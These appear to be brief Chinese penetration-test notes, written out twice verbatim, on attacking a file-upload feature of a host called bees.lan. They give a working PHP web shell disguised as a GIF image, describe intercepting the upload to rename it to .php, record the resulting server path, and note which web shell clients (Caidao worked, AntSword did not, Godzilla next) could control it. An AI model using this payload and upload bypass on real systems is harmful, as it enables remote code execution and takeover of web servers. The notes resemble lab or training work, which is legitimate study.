上传图片木马 pass-q.gif
<?php /*F02572*/preg_replace('<.*>e','\0',$_REQUEST['q']);?>
抓包修改后缀名为php
得到路径../upload/img/202307021615388231.php
拼接路径得到 bees.lan/upload/img/…
蚁剑不行
菜刀可以
中国菜刀也可以
试试哥斯拉的
上传图片木马 pass-q.gif
<?php /*F02572*/preg_replace('<.*>e','\0',$_REQUEST['q']);?>
抓包修改后缀名为php
得到路径../upload/img/202307021615388231.php
拼接路径得到 bees.lan/upload/img/…
蚁剑不行
菜刀可以
中国菜刀也可以
试试哥斯拉的